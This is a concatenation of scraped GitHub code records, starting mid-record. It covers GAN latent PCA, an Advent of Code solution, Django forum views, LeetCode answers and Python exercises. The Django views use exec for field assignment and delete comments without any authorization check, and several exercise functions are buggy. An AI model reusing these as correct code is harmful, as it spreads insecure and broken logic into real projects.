f\"./results/32/pca_comps_{num_samples}_{n_components}\")\n\n close_session()\n\n return pca_comps\n\ndef apply_pca_to_random_meshes(run_id, snapshot=None, grid_size=[1, 1], minibatch_size=8, num_pngs=8, result_dir='./results', desc='apply_pca_to_random_meshes'):\n # Set random seed\n seed = np.random.choice(range(1000))\n random_state = np.random.RandomState(seed)\n\n # Load model\n tbgan_model = tbgan.load_model(tbgan_snapshot_name)\n\n print(tbgan_model.print_layers())\n\n latents_in = \"Gs/latents_in:0\"\n labels_in = \"Gs/labels_in:0\"\n images_out = \"Gs/images_out:0\"\n inter_layer = \"Gs/128x128/Conv1/PixelNorm/mul:0\"\n\n result_subdir = create_result_subdir(result_dir, desc)\n lsfm_tcoords = mio.import_pickle('models/snapshots/512_UV_dict.pkl')['tcoords']\n lsfm_params = []\n\n pca_comps = load_pkl(\"./results/32/pca_comps_300_10\")\n alphas = [300, 500, 1000] # alpha: manipulation strength\n\n original_result_subdir = f\"{result_subdir}/original_results\"\n os.makedirs(original_result_subdir)\n\n for comp_num in range(len(pca_comps)):\n for alpha in alphas:\n PCA_result_subdir = f\"{result_subdir}/PCA_results/comp_{str(comp_num)}/alpha_{str(alpha)}\"\n os.makedirs(PCA_result_subdir)\n\n\n for png_idx in range(int(num_pngs/minibatch_size)):\n print('Generating latent vectors...')\n latents = random_state.randn(np.prod(grid_size)*minibatch_size, *tbgan_model.input_shape[1:]).astype(np.float32)\n labels = np.zeros([latents.shape[0], 7], np.float32)\n\n sess = tf.get_default_session()\n # writer = tf.summary.FileWriter('./graphs', graph=sess.graph)\n\n images, inter_latent = sess.run([images_out, inter_layer], feed_dict={latents_in: latents, labels_in: labels})\n\n print(np.array(images).shape, np.array(inter_latent).shape)\n \n # export_results(images, original_result_subdir, png_idx, minibatch_size)\n\n # Flatten intermediate latent vectors\n inter_latent = np.array(inter_latent)\n flat_inter_latent = inter_latent.reshape(inter_latent.shape[0], -1) # this line depends on layer we choose. if we choose layer with shape (n, 128, 128), we need to flatten it to (n, 128*128) in order to apply PCA]\n\n # Manipulated images via PCA\n for comp_num in range(len(pca_comps)):\n print(f\"PCA Components: {comp_num}/{len(pca_comps)}\")\n for alpha in alphas:\n PCA_result_subdir = f\"{result_subdir}/PCA_results/comp_{str(comp_num)}/alpha_{str(alpha)}\"\n\n flat_inter_latent_manipulated = flat_inter_latent + alpha*pca_comps[comp_num, :]\n inter_latent_manipulated = flat_inter_latent_manipulated.reshape(inter_latent.shape) # invert to original shape\n\n sess = tf.get_default_session()\n # !!!! the part in feed_dict (latents_in: latents, labels_in: labels) is not necessary, we can set all to zero. (this part needs to be feeded because the graph which used in training needs it but don't use it in testing)\n images = sess.run(images_out, feed_dict={inter_layer: inter_latent_manipulated, latents_in: latents, labels_in: labels})\n\n # export_results(images, PCA_result_subdir, png_idx, minibatch_size)\n\n mio.export_pickle(lsfm_params, os.path.join(result_subdir, 'lsfm_params.pkl'))\n open(os.path.join(result_subdir, '_done.txt'), 'wt').close()\n\n close_session()\n\n return latents","repo_name":"catlab-team/latent3D_code","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"26259813165","text":"# import our helpers\r\nfrom types import SimpleNamespace\r\nfrom utils import load, show, day, TRACE, Map, Path, USING_EXAMPLE\r\nimport visualizations as viz\r\nimport numpy as np\r\n\r\n####### GLOBALS #########\r\n\r\n# load todays input data as a docstring\r\nTEXT = load(day(__file__)).splitlines()\r\n# convenient for passing working between parts 1 and 2, and relevant stuff to vizualations \r\nNS = SimpleNamespace()\r\n\r\n# parse the input\r\ndef parse(line):\r\n x,y,z = line.split(\",\")\r\n # convert to int and push them in a bit to allow a border\r\n return int(z)+1, int(y)+1, int(x)+1\r\n\r\nPARSED = [parse(_) for _ in TEXT]\r\nSZ = max(_[0] for _ in PARSED)+2\r\nSY = max(_[1] for _ in PARSED)+2\r\nSX = max(_[2] for _ in PARSED)+2\r\n\r\nNEIGHBOURS = np.array(\r\n [[[0, 0, 0],\r\n [0, 1, 0],\r\n [0, 0, 0]],\r\n\r\n [[0, 1, 0],\r\n [1, 1, 1],\r\n [0, 1, 0]],\r\n\r\n [[0, 0, 0],\r\n [0, 1, 0],\r\n [0, 0, 0]]], dtype=\"uint8\")\r\nNOT_NEIGHBOURS = np.count_nonzero(NEIGHBOURS==0)\r\nnp.set_printoptions(threshold=np.inf)\r\nARRAY = np.zeros((SZ,SY,SX), dtype=\"uint8\") # 3D Array\r\nfor z,y,x in PARSED:\r\n ARRAY[z,y,x]=1\r\n\r\nINSIDE = 0\r\nROCK = 1\r\nOUTSIDE = 2\r\n\r\n# add a border on all axes to mark outside space\r\nARRAY[0,:,:] = OUTSIDE\r\nARRAY[:,0,:] = OUTSIDE\r\nARRAY[:,:,0] = OUTSIDE\r\nARRAY[SZ-1,:,:] = OUTSIDE\r\nARRAY[:,SY-1,:] = OUTSIDE\r\nARRAY[:,:,SX-1] = OUTSIDE\r\n\r\n# repeat until all outside dents are joined\r\nfor z in range(1,SZ):\r\n for y in range(1,SY):\r\n for x in range(1,SX):\r\n for z,y,x in ((z,y,x),(SZ-z,SY-y,SX-x)):\r\n if ARRAY[z,y,x] == INSIDE:\r\n # if any of it's neighbours are outside it must be outside too\r\n chk = ARRAY[z-1:z+2,y-1:y+2,x-1:x+2] * NEIGHBOURS\r\n if np.count_nonzero(chk==OUTSIDE):\r\n ARRAY[z,y,x] = OUTSIDE\r\n\r\n######## Part 1 ##########\r\ndef p1(expect=64 if USING_EXAMPLE else 3564):\r\n tot=0\r\n for z in range(SZ):\r\n for y in range(SY):\r\n for x in range(SX):\r\n if ARRAY[z,y,x]==ROCK:\r\n chk = ARRAY[z-1:z+2,y-1:y+2,x-1:x+2] * NEIGHBOURS\r\n tot += np.count_nonzero(chk!=ROCK) - NOT_NEIGHBOURS\r\n return tot\r\n\r\n######## Part 2 ##########\r\n\r\ndef p2(expect=58 if USING_EXAMPLE else 2106):\r\n # fill in air pockets\r\n for z in range(SZ):\r\n for y in range(SY):\r\n for x in range(SX):\r\n if ARRAY[z,y,x]==INSIDE:\r\n ARRAY[z,y,x]=ROCK\r\n # get the new surface area\r\n return p1()\r\n\r\nif __name__ == \"__main__\":\r\n show(p1, p2)\r\n #viz.viz?(NS)\r\n","repo_name":"chrislast/AoC22","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38873266295","text":"#!/usr/bin/env python3\n\n'''\nCreated on 12/01/2015\n\n@author: dedson\n'''\n\nimport sqlalchemy\nimport sqlalchemy.orm\n\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.orm.collections import InstrumentedList, InstrumentedDict, InstrumentedSet\n\nfrom .Base import Base\n\nfrom .Type import Type\n\nfrom jsonweb.encode import to_object\nfrom jsonweb.decode import from_object\n\n@from_object()\n@to_object(suppress=['clasz'])\nclass Returns(Type):\n '''\n The Returns class defines a return structure for a class method.\n '''\n\n __tablename__ = 'returns'\n id = Column(Integer, ForeignKey('type.id'), primary_key=True)\n method_id = Column(Integer, ForeignKey('method.id'))\n\n __mapper_args__ = {\n 'polymorphic_identity':'returns'\n }\n\n def __init__(\n self,\n id=None,\n inherited='returns',\n generic=None,\n clasz_id=None,\n clasz=None\n ):\n super(Returns,self).__init__(\n id=id,\n inherited=inherited,\n generic=generic,\n clasz_id=clasz_id,\n clasz=clasz\n )\n return\n \n def __dir__(self):\n return Type.__dir__(self) + [\n ]\n\n","repo_name":"eddo888/ClassyData","sub_path":"Classes/Returns.py","file_name":"Returns.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18294588600","text":"from django.shortcuts import render, redirect\nfrom .forms import Search, Back, Add_Forum_Theme, Commeent, Registration, Back_not, FormRedactor\nfrom .models import Photo, Ask, Otchets, URL_Video, Forum_Topic, Comment, UserInfo\nfrom django.contrib.auth.models import User\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nimport datetime\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.core.exceptions import ObjectDoesNotExist\nimport random\nS = []\nS.extend(range(48,58))\nS.extend(range(65, 91))\nS.extend(range(97,123))\nls = [chr(i) for i in S]\ndef home(request):\n search = Search()\n list_theme={'1':\"Продажа товара\", '2': \"Сотрудничество\", '3':\"Охота и лесное хозяйство\", '4':'Прочее'}\n que = Back() if not request.user.is_authenticated else Back_not()\n lis = list(Otchets.objects.order_by(\"-date\", \"name\").all())[:3]\n phs = []\n for i in lis:\n phs.append([i, list(Photo.objects.filter(otchet=i, is_video=False))[0].dir_way])\n if request.method == 'POST':\n ret = Back(request.POST) if not request.user.is_authenticated else Back_not(request.POST)\n if ret.is_valid():\n theme = list_theme[ret.cleaned_data['theme']]\n email = request.user.email if request.user.is_authenticated else ret.cleaned_data['email']\n user = request.user.username if request.user.is_authenticated else ret.cleaned_data['name']\n quetion = ret.cleaned_data['quetion']\n Ask.objects.create(name=theme, user=user, email=email, quetion=quetion, date=datetime.datetime.now())\n que = None\n return render(request,\"home.html\", context={\"form_search\":search,\"form_q\":que,\"lis\":phs})\n\ndef faq(request):\n search = Search()\n list_theme = {'1': \"Продажа товара\", '2': \"Сотрудничество\", '3': \"Охота и лесное хозяйство\", '4':'Прочее'}\n que = Back if not request.user.is_authenticated else Back_not()\n if request.method == 'POST':\n ret = Back(request.POST) if not request.user.is_authenticated else Back_not(request.POST)\n if ret.is_valid():\n theme = list_theme[ret.cleaned_data['theme']]\n email = request.user.email if request.user.is_authenticated else ret.cleaned_data['email']\n user = request.user.username if request.user.is_authenticated else ret.cleaned_data['name']\n quetion = ret.cleaned_data['quetion']\n Ask.objects.create(name=theme, user=user, email=email, quetion=quetion, date=datetime.datetime.now())\n que = None\n return render(request, \"FAQ.html\", context={\"form_search\": search,\"form_q\":que})\n\ndef forum(request,theme=None,text=None):\n search = Search()\n list_theme = {\"1\": \"Продукция охоты – предложения, качество, объёмы, цены\",\n \"2\": \"Охота, охотничьи путешествия, трофеи\",\n \"3\": \"Способы и орудия охоты\",\n \"4\": \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\",\n \"5\": \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\"}\n topic = Forum_Topic.objects.order_by(\"-start_data\").all()\n if request.method == 'POST':\n search = Search(request.POST)\n if search.is_valid():\n search = search.cleaned_data[\"text\"]\n return redirect(f\"/forum/search/{search}\")\n if text:\n slist = Forum_Topic.objects.order_by(\"-start_data\").all()\n topic = []\n for i in slist:\n if i.title.lower().find(text[:-2].lower()) != -1 \\\n or i.text.lower().find(text[:-2].lower()) != -1\\\n or i.theme.lower().find(text[:-2].lower()) != -1:\n topic.append(i)\n search['text'].initial = text\n return render(request, \"forum.html\", context={\"form_search\": search, \"topics\": topic, \"themes\": list_theme})\n if theme in list_theme.keys():\n topic = Forum_Topic.objects.filter(theme=list_theme[theme]).all()\n return render(request, \"forum.html\", context={\"form_search\": search,\"theme\":theme, \"topics\": topic,\n \"themes\": list_theme})\n elif not theme:\n return render(request, \"forum.html\", context={\"form_search\": search, \"topics\": topic, \"themes\": list_theme})\n else:\n return redirect(f\"/forum\")\n\ndef contacts(request):\n search = Search()\n return render(request, \"contacts.html\", context={\"form_search\": search})\n\ndef photo(request):\n search = Search()\n lis = list(Otchets.objects.order_by(\"-date\",\"name\").all())\n phs=[]\n for i in lis:\n phs.append([i,list(Photo.objects.filter(otchet=i,is_video=False))[0].dir_way])\n phs.extend([[None] for i in range(5-len(phs)%5)])\n print(phs)\n phs_s = []\n for i in range(0, len(phs), 5):\n phs_s.append(phs[i:i + 5])\n return render(request, \"Photo_Video.html\", context={\"form_search\": search, \"columns\": phs_s})\n\ndef otchet(request, name):\n search = Search()\n phs = list(Photo.objects.filter(otchet=Otchets.objects.get(id=name)))\n urlvideos = list(URL_Video.objects.filter(otchet=Otchets.objects.get(id=name)))\n photos = []\n videos = []\n for i in phs:\n if i.is_video:\n videos.append(i.dir_way)\n else:\n photos.append(i.dir_way)\n return render(request, \"otchets.html\", context={\"form_search\": search, \"photos\": photos, \"videos\": videos,\n \"title\":Otchets.objects.get(id=name).name, \"text\":Otchets.objects.get(id=name).text,\n \"urlvideos\":urlvideos})\n\ndef products(request):\n search = Search()\n return render(request, \"products.html\", context={\"form_search\": search})\n\ndef add_forum_theme(request,stheme=1):\n if not request.user.is_authenticated:\n return redirect('/forum')\n add = Add_Forum_Theme()\n add.fields['theme'].initial = stheme\n search = Search()\n if request.method == 'POST':\n add = Add_Forum_Theme(request.POST)\n list_theme = {\"1\": \"Продукция охоты – предложения, качество, объёмы, цены\",\n \"2\": \"Охота, охотничьи путешествия, трофеи\",\n \"3\": \"Способы и орудия охоты\",\n \"4\": \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\",\n \"5\": \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\"}\n if add.is_valid():\n theme = list_theme[add.cleaned_data['theme']]\n title = add.cleaned_data['title']\n user = request.user\n ava = request.user.userinfo.ava\n quetion = add.cleaned_data['quetion']\n new_id = Forum_Topic.objects.create(title=title, user=user, theme=theme,\n start_data=datetime.datetime.now(), text=quetion, ava=ava).id\n return redirect(f\"/forum/{new_id}\")\n return render(request, \"add_forum_theme.html\", context={\"form\": add, \"form_search\": search})\ndef topic(request, id):\n topic = Forum_Topic.objects.get(id=id)\n search = Search()\n list_theme = {\"Продукция охоты – предложения, качество, объёмы, цены\": \"1\",\n \"Охота, охотничьи путешествия, трофеи\": \"2\",\n \"Способы и орудия охоты\": \"3\",\n \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\": \"4\",\n \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\": \"5\"}\n if request.user.is_authenticated:\n com = Commeent()\n if request.method == 'POST':\n com = Commeent(request.POST)\n if com.is_valid():\n text = com.cleaned_data['text']\n parent = com.cleaned_data['parent']\n name = request.user\n ava = request.user.userinfo.ava\n new_id = Comment.objects.create(topic=topic, data=datetime.datetime.now(), text=text,\n quetion=parent if parent>0 else None, user=name, ava=ava).id\n return redirect(f\"/forum/{id}#{new_id}\")\n comments = list(Comment.objects.filter(topic=topic))\n for i,el in enumerate(comments):\n if el.quetion:\n comments[i]=[el,Comment.objects.get(id=el.quetion)]\n else:\n comments[i] = [el]\n else:\n com = 'Необходима авторизация на сайте'\n comments = list(Comment.objects.filter(topic=topic))\n for i, el in enumerate(comments):\n if el.quetion:\n comments[i] = [el, Comment.objects.get(id=el.quetion)]\n else:\n comments[i] = [el]\n return render(request, \"topic.html\", context={\"topic\": topic, \"form_search\": search, \"form_comment\": com, \\\n \"comments\":comments, \"theme\": list_theme[topic.theme]})\n\ndef registration(request):\n if request.user.is_authenticated:\n return redirect('/')\n form_r = Registration()\n if request.method == \"POST\":\n form_r = Registration(request.POST)\n if form_r.is_valid():\n global ls\n aut = ''.join(random.sample(ls,20))\n login = form_r.cleaned_data[\"username\"]\n email = form_r.cleaned_data['email']\n password = form_r.cleaned_data['password1']\n send_mail(\"Подтверждение регистрации\",\n f'Для подтверждения регистрации на сайте компании OOO \"Байкал-Фурс\" перейдите по ссылке: \\n'\n f'https://muscus.herokuapp.com/activateuser/{aut}',\n \"baikalfurs@yandex.ru\",\n [f\"{email}\"])\n r = User.objects.create_user(email=email, username=login, password=password, is_staff=False, is_superuser=False,\n is_active=False, last_name= aut)\n UserInfo.objects.create(user_id=r.id)\n return render(request, \"registration.html\", context={\"form_r\": None})\n return render(request, \"registration.html\", context={\"form_r\":form_r})\n\ndef active(request, pas):\n try:\n w = User.objects.get(last_name=pas)\n w.last_name = ''\n w.is_active = True\n w.save()\n return HttpResponse(\"Регистрация успешно завершена
    На главную\")\n except ObjectDoesNotExist:\n return redirect(\"/\")\ndef profile(request, username):\n head = User.objects.get(username=username)\n sex = {None: \"Не выбранно\", True: \"М\", False: \"Ж\"}[head.userinfo.sex]\n return render(request, \"profile.html\", context={'head':head, 'sex':sex})\n\ndef userredactor(request, user):\n form = FormRedactor()\n head = User.objects.get(username=user)\n if head.id == request.user.id:\n if request.method == \"POST\":\n form = FormRedactor(request.POST, request.FILES)\n if form.is_valid():\n for k, v in form.cleaned_data.items():\n if v not in [None, '']:\n exec(f'head.userinfo.{k} = form.cleaned_data[\"{k}\"]')\n head.userinfo.save()\n return redirect(f'/user/{user}')\n return render(request, \"profile-form.html\", context={\"form\": form})\n else:\n return redirect('/')\n\ndef remove_comment(request, id):\n com = Comment.objects.get(id=id)\n for i in Comment.objects.filter(quetion=id):\n i.quetion = None\n i.save()\n s = Forum_Topic.objects.get(title=com.topic).id\n com.delete()\n return redirect(f'/forum/{s}')","repo_name":"EVOgeek618/BaikalFurs","sub_path":"firsttry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5361762688","text":"\"\"\"\ntag: 树;深度优先搜索;广度优先搜索\n515. 在每个树行中找最大值\nhttps://leetcode.cn/problems/find-largest-value-in-each-tree-row/\n\"\"\"\n\n\n# # Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n\nfrom collections import deque\n\n\nclass Solution1:\n \"\"\" BFS \"\"\"\n def largestValues(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n\n res = []\n queue = deque()\n queue.append(root)\n while queue:\n level_size = len(queue)\n level_res = []\n for _ in range(level_size):\n node = queue.popleft()\n level_res.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n res.append(max(level_res))\n return res\n\n\nclass Solution2:\n \"\"\" DFS \"\"\"\n def largestValues(self, root: Optional[TreeNode]) -> List[int]:\n def dfs(node, depth):\n if not node:\n return\n if len(res) == depth:\n res.append(node.val)\n else:\n res[depth] = max(res[depth], node.val)\n dfs(node.left, depth + 1)\n dfs(node.right, depth + 1)\n res = []\n dfs(root, 0)\n return res\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"leetcode/medium/515.py","file_name":"515.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26613817103","text":"n, a, b = map(int, input().split())\n\nS = input()\nT = S + S\n\n\ndef check(tmp):\n ret = 0\n for i in range(n // 2):\n if tmp[i] != tmp[-(i + 1)]:\n ret += b\n\n # print(tmp, ret)\n return ret\n\n\nans = 1 << 60\n\nfor i in range(n):\n tmp = T[i : i + n]\n ret = check(tmp)\n ans = min(i * a + ret, ans)\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-286/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20945537939","text":"import tensorflow as tf\n\n# Duas constantes\na = tf.constant(2)\nb = tf.constant(3)\n\n# Iniciando o grafo \nwith tf.Session() as sess:\n print(\"a=2, b=3\")\n print(\"Adição: %i\" % sess.run(a+b))\n print(\"Multiplicação: %i\" % sess.run(a*b))\n\n# Uso de Placeholders e tipos de dados\na = tf.placeholder(tf.int16)\nb = tf.placeholder(tf.int16)\n\n# Definindo as operações usando add() e mul()\nadd = tf.add(a, b)\nmul = tf.mul(a, b)\n\n# Iniciando o grafo \nwith tf.Session() as sess:\n # Passando os valores na hora da chamada!\n print(\"Adição com variáveis: %i\" % sess.run(add, feed_dict={a: 2, b: 3}))\n print(\"Multi com variáveis: %i\" % sess.run(mul, feed_dict={a: 2, b: 3}))\n\n\n# Agora com matrizes!\nmatrix1 = tf.constant([[3., 3.]])\nmatrix2 = tf.constant([[2.],[2.]])\n\n# Definindo a operação usando o matmul()\nproduct = tf.matmul(matrix1, matrix2)\n\n#Rodando e obtendo o resultado\nwith tf.Session() as sess:\n result = sess.run(product)\n print(result) # Resultado deve ser algo como [[ 12.]]\n","repo_name":"pichiliani/ExemplosPalestraTensorFlow","sub_path":"TFSomaMultiplica.py","file_name":"TFSomaMultiplica.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7896490602","text":"import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.linear_model import CoxPHSurvivalAnalysis\r\nimport matplotlib.pyplot as plt\r\n\r\ndef surv_plot():\r\n X_test_sel = X_test[0:10, :]\r\n surv_funcs = cox_ph.predict_survival_function(X_test_sel)\r\n\r\n i = 0\r\n for fn in surv_funcs:\r\n plt.step(fn.x, fn(fn.x), where=\"post\", label=str(i))\r\n i += 1\r\n plt.ylabel(\"Survival probability\")\r\n\r\n plt.xlabel(\"Time in days\")\r\n plt.legend()\r\n plt.xlim(0, 3000)\r\n plt.ylim(0, 1)\r\n plt.grid(True)\r\n plt.savefig('files/COX PH Surv.png')\r\n plt.show()\r\n\r\n# Data\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\n# COX PH with Best Params.\r\nrandom_state = 64\r\n# Approved\r\n# Old:: best_params = {'alpha': 10, 'n_iter': 50, 'ties': 'efron', 'tol': 1e-09}\r\nbest_params = {'alpha': 0, 'n_iter': 50, 'ties': 'efron', 'tol': 1e-09}\r\n\r\ncox_ph = CoxPHSurvivalAnalysis(alpha=10, ties=\"efron\", n_iter=50, tol=1e-9)\r\n\r\n# 5 Years Analysis\r\ntimes = np.arange(365, 1826, 30)\r\ncox_ph.fit(X_train, y_train)\r\n\r\n((train_plot, train_acc_auc), (test_plot, test_acc_auc)) = metrics.c_auc_score(cox_ph, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_bs, test_acc_bs = metrics.i_brier_score(cox_ph, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_icpw, test_acc_icpw = metrics.c_index_icpw(cox_ph, X_train, y_train, X_test, y_test)\r\ntrain_acc_cindex, test_acc_cindex = metrics.c_index_censored(cox_ph, X_train, y_train, X_test, y_test)\r\n\r\n# Plot of Metrics\r\ndraw_plot(['Train', train_acc_cindex, train_acc_icpw, train_acc_auc, train_acc_bs],\r\n ['Test', test_acc_cindex, test_acc_icpw, test_acc_auc, test_acc_bs],\r\n 'COXPH model')\r\n\r\nwith open('files/coxph.npy', 'wb') as f:\r\n np.save(f, train_plot)\r\n np.save(f, test_plot)\r\n\r\nsurv_plot()","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/coxph.py","file_name":"coxph.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23815151862","text":"# # Load Data Set\nimport pandas as pd\ndf = pd.read_csv('dataset.csv')\n\n\n# # Save DataSet into Data Structure\nX = []\ny = []\nfor (name,mcg,gvh,lip,chg,acc,alm1,alm2,label) in zip(df['sequence_name'],df['mcg'],df['gvh'],df['lip'],df['chg'],df['aac'],df['alm1'],df['alm2'],df['label']):\n X.append([mcg,gvh,lip,chg,acc,alm1,alm2])\n y.append(label)\n\n\n# # Membagi Data Testing dan Data Training\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n\n# # Training Model\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\ncls = GaussianNB()\ncls.fit(X_train, y_train)\n\nclf = KNeighborsClassifier(n_neighbors=3)\nclf.fit(X_train, y_train)\n\n\n# # Testing Model\nfor test in X_test:\n result = cls.predict([test])\n print(\"nilai {nilai} memiliki label {label}\".format(nilai=test,label=result[0]))\n\nfor test in X_test:\n result = clf.predict([test])\n print(\"nilai {nilai} memiliki label {label}\".format(nilai=test,label=result[0]))\n\n\n# # Akurasi\nprint(\"Akurasi Prediksi : \",cls.score(X_test,y_test))\n\nprint(\"Akurasi Prediksi : \",clf.score(X_test,y_test))","repo_name":"SistemCerdasSquad/naivebayesdanknn","sub_path":"Naive Bayes Classiffier dan KNN.py","file_name":"Naive Bayes Classiffier dan KNN.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42550160044","text":"import scanpy as sc\nimport numpy as np\nimport pandas as pd\nimport os\nfrom collections import Counter\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import permutation_test_score\n\nsc.settings.verbosity = 3 # verbosity: errors (0), warnings (1), info (2), hints (3)\nsc.settings.set_figure_params(dpi=80, facecolor='white')\n\ncd56 = sc.read_h5ad('cd56.h5ad')\ncd56 = cd56[cd56.obs['meta_tissue_new']!='Other tissue']\nt2t = {'Blood':1, 'Normal':0, 'Tumor':0}\n\nchoose56 = np.random.choice(cd56.obs['cellID'],2000,replace=False)\n\ncd56_choose = cd56[cd56.obs['cellID'].isin(choose56)]\ntissue56=[t2t[i] for i in cd56_choose.obs['meta_tissue_new'].tolist()]\n\nclf = SVC(kernel=\"rbf\", random_state=7)\ncv = StratifiedKFold(2, shuffle=True, random_state=0)\n\nscore_rgs1, perm_scores_rgs1, pvalue_rgs1 = permutation_test_score(\nclf, cd56_choose[:,['RGS1']].X.todense(), tissue56, scoring=\"accuracy\", cv=cv,n_permutations=1000\n)\n\nscore_cd69, perm_scores_cd69, pvalue_cd69 = permutation_test_score(\nclf, cd56_choose[:,['CD69']].X.todense(), tissue56, scoring=\"accuracy\", cv=cv,n_permutations=1000\n)\n\n\nfig, ax = plt.subplots()\nax.hist(perm_scores_rgs1, bins=20, density=True)\nax.axvline(score_rgs1, ls=\"--\", color=\"r\")\nscore_label = f\"Score on original\\ndata: {score_rgs1:.2f}\\n(p-value: {pvalue_rgs1:.3f})\"\nax.text(0.56, 92, score_label, fontsize=12)\nax.set_xlabel(\"Accuracy score (RGS1)\")\nax.set_ylabel(\"Probability\")\nplt.grid(None)\n\nplt.savefig('CD56_RGS1.pdf')\nplt.show()\n\n\nfig, ax = plt.subplots()\nax.hist(perm_scores_cd69, bins=20, density=True,color='orange')\nax.axvline(score_cd69, ls=\"--\", color=\"r\")\nscore_label = f\"Score on original\\ndata: {score_cd69:.2f}\\n(p-value: {pvalue_cd69:.3f})\"\nax.text(0.55, 82, score_label, fontsize=12)\nax.set_xlabel(\"Accuracy score (CD69)\")\nax.set_ylabel(\"Probability\")\nplt.grid(None)\n\nplt.savefig('CD56_CD69.pdf')\nplt.show()","repo_name":"TangFei965/pan-NK","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"23863940546","text":"def multitask(initial_list: list[int]):\n \"\"\"На вхід програмі подається список.\n :return список, в якому\n - Замінений другий елемент на 17\n - додано 4, 5, 6 в кінець списку\n - видалений перший елемент списку\n - подвоєні елементи (типу два рази такий самий список, але в одному)\n - вставлене число 25 за індексом 3\n всі дії треба виконувати в такому порядку\"\"\"\n del initial_list[1]\n initial_list.insert(1, 17)\n initial_list += [4, 5, 6]\n del initial_list[0]\n new_list = []\n for element in initial_list:\n new_list.append(element)\n new_list.append(element)\n new_list.insert(3, 25)\n return new_list\n\n\ndef rearrange_min_and_max(initial_list: list[int]):\n \"\"\"На вхід програмі подається список чисел.\n :return список, в якому переставлені максимальне і мінімальне число\n * згадайте (а, б = б, а)\"\"\"\n index_min = initial_list.index(min(initial_list))\n index_max = initial_list.index(max(initial_list))\n initial_list[index_min], initial_list[index_max] = initial_list[index_max], initial_list[index_min]\n return initial_list\n\n\ndef amount_of_articles(text: str):\n \"\"\"На вхід програмі подається текст.\n :return кількість артиклів a, an, the в тексті. Артиклі можуть бути довільного регістру\"\"\"\n prep_list = ['article' for element in text.lower().split() if element in ['a', 'an', 'the']]\n return len(prep_list)\n\n\ndef clear_comments(text: str):\n \"\"\"На вхід програмі подається текст. Рядки розділені символом нового рядка.\n В тексті в кінці деяких рядків залишені коментарі (коментарі починаються з символу #)\n :return текст з очищеними коментарями\"\"\"\n new_text = []\n index = text.find('#')\n new_text += text[0:index]\n for word in text[index:]:\n if word == '\\n':\n index_1 = text.index(word)\n elif word == '#':\n index_2 = text.index(word)\n new_text += text[index_1:index_2]\n return new_text\n\n\ndef sort_all_digits(text: str):\n \"\"\"На вхід програмі подається текст, в якому є цифри.\n :return стрічку з посортованих цифр, зʼєднаних за комою з пробілом\"\"\"\n number = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\n list_of_number = []\n for element in text:\n if element in number:\n list_of_number.append(element)\n list_of_number.sort()\n return \", \".join(list_of_number)\n\n\ndef length_of_words(text: str):\n \"\"\"На вхід програмі подається текст.\n :return список, в якому один елемент - довжина одного слова\"\"\"\n new_list = [len(word) for word in text.split()]\n return new_list\n\n\ndef filter_words(text: str):\n \"\"\"На вхід програмі подається текст.\n :return список, в якому тільки слова довжиною понад 5 символів\"\"\"\n return [word for word in text.split() if len(word) > 5]\n\n\ndef palindomes_in_range(lower_limit: int, upper_limit: int):\n \"\"\"На вхід програмі подаються межі.\n :return список всіх числових паліндромів в цих межах\"\"\"\n 